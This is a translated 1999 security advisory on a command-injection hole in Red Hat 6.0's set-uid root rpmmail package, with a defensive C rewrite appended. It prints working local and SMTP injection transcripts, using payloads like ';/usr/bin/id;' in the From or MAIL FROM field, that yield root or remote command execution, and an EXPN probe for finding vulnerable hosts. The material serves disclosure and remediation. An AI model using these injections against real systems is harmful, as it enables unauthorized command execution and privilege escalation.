NSFOCUS Security Monthly, Issue 2: Latest Vulnerabilities
Red Hat 6.0: rpmmail local/remote root vulnerability

Compiled by: rocky
Date: 1999-10-15


    The Red Hat 6.0 extras CD ships a package called rpmmail. Once installed, rpmmail contains a serious root-level vulnerability: it may allow an ordinary local or remote user to obtain root privileges, or to execute arbitrary commands remotely as "nobody".

    Sending an e-mail to rpmmail@vulnerablehost causes /home/rpmmail/rpmmail (set-uid root by default, and invoked remotely through a .forward file) to pass any command you choose to system(3). The command does not necessarily run with root privileges, because of bash's handling of euid != uid of the caller. system(3) invokes /bin/sh -c, and on the default configuration of some Linux systems, SuSE 6.2 for example, /bin/sh is linked to /bin/bash v2. As the system(3) manual page notes, the root exploit does not work on systems where /bin/sh is bash version 2, because from bash version 2 onward /bin/sh gives up its special privileges at startup. Some systems with rpmmail installed are therefore exposed to a remote/local root vulnerability, and even where the root escalation fails, any unprivileged user can still execute commands remotely.

The local vulnerability:

/bin/sh is linked to /bin/bash (default SuSE 6.2 behavior):
bash-2.03$ ls -la /bin/sh
lrwxrwxrwx 1 root root 9 Oct 5 11:27 /bin/sh -> /bin/bash
bash-2.03$ cat /etc/SuSE-release;uname -a;id
SuSE Linux 6.2 (i386)
VERSION = 6.2
Linux fear62 2.2.10 #1 Tue Jul 20 16:32:24 MEST 1999 i686 unknown
uid=100(xnec) gid=100(users) groups=100(users)
bash-2.03$ echo "From: ;/usr/bin/id;" | /home/rpmmail/rpmmail -c bah
Could not open config file!
sh: Y: command not found
uid=100(xnec) gid=100(users) groups=100(users)
Could not open acknowledge file!
bash-2.03$

----

After linking /bin/sh to /bin/ksh instead:

bash-2.03$ ls -la /bin/sh
lrwxrwxrwx 1 root root 8 Oct 5 11:09 /bin/sh -> /bin/ksh
bash-2.03$ cat /etc/SuSE-release;uname -a;id
SuSE Linux 6.2 (i386)
VERSION = 6.2
Linux fear62 2.2.10 #1 Tue Jul 20 16:32:24 MEST 1999 i686 unknown
uid=100(xnec) gid=100(users) groups=100(users)
bash-2.03$ echo "From: ;/usr/bin/id;" | /home/rpmmail/rpmmail -c bah
Could not open config file!
sh: Y: not found
uid=100(xnec) gid=100(users) euid=0(root) egid=0(root) groups=100(users)
Could not open acknowledge file!
bash-2.03$


The remote vulnerability:

bash-2.03$ telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 fear62 Smail-3.2 (#1 1999-Jul-23) ready at Tue, 5 Oct 1999 11:31:13 -0500
(CDT)
MAIL FROM: ;/command/to/execute;
250 <;/command/to/execute;> ... Sender Okay
RCPT TO: rpmmail
250 ... Recipient Okay
data
354 Enter mail, end with "." on a line by itself
.
250 Mail accepted
quit

Confirming whether a host is vulnerable is straightforward: use the EXPN command to check whether the .forward entry exists:

220 fear62 Smail-3.2 (#1 1999-Jul-23) ready at Tue, 5 Oct 1999 11:38:44 -0500
(CDT)
EXPN rpmmail
250 "| /home/rpmmail/rpmmail -c /home/rpmmail/rpmmail.conf"

Fix:
    Check http://www.redhat.com for the latest patch.
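The root cause described above is a From: header being interpolated into a shell command string and handed to system(3) by a set-uid root program. The following is an added example, not rpmmail's or Red Hat's code, of how such an acknowledgement sender can be written so that no shell ever sees the address: the sender is validated against an allowlist, the set-uid privilege is dropped, and sendmail is exec'd with an argv array. The sendmail path and its flags are assumptions.

```c
#include <ctype.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Accept only characters that belong in a plain mailbox address.
 * Shell metacharacters (';', '|', '`', '$', spaces, ...) are rejected
 * outright rather than escaped. A leading '-' is rejected as well so
 * the address can never be parsed as an option by the exec'd program.
 * Returns 1 if the address is acceptable, 0 otherwise. */
int sender_is_safe(const char *addr) {
    size_t n = strlen(addr);
    if (n == 0 || n > 254 || addr[0] == '-') return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)addr[i];
        if (!isalnum(c) && strchr("@.-_+", c) == NULL) return 0;
    }
    return 1;
}

/* Extract the address from a "From: ..." header line (constructed,
 * simple form without display names). Returns 1 on success. */
int extract_from(const char *line, char *out, size_t outlen) {
    if (strncmp(line, "From:", 5) != 0) return 0;
    const char *p = line + 5;
    while (*p == ' ' || *p == '\t') p++;
    size_t len = strcspn(p, "\r\n");
    if (len == 0 || len >= outlen) return 0;
    memcpy(out, p, len);
    out[len] = '\0';
    return 1;
}

/* Send the acknowledgement by exec'ing sendmail directly with an argv
 * array: no /bin/sh is involved, so metacharacters in the address are
 * only bytes of an argument. The child first drops the set-uid root
 * privilege so a defect here cannot yield root. The sendmail path is an
 * assumption. Returns the child's exit status, or -1 on error/rejection. */
int send_ack(const char *sender) {
    if (!sender_is_safe(sender)) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        if (setuid(getuid()) != 0) _exit(126); /* give up euid 0 */
        execl("/usr/sbin/sendmail", "sendmail", "-i", sender, (char *)NULL);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

With this structure the injected header from the transcripts above is rejected before any process is spawned, and a header that passes validation reaches sendmail as a single argument rather than as shell input.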

All rights reserved. Reproduction without permission is prohibited.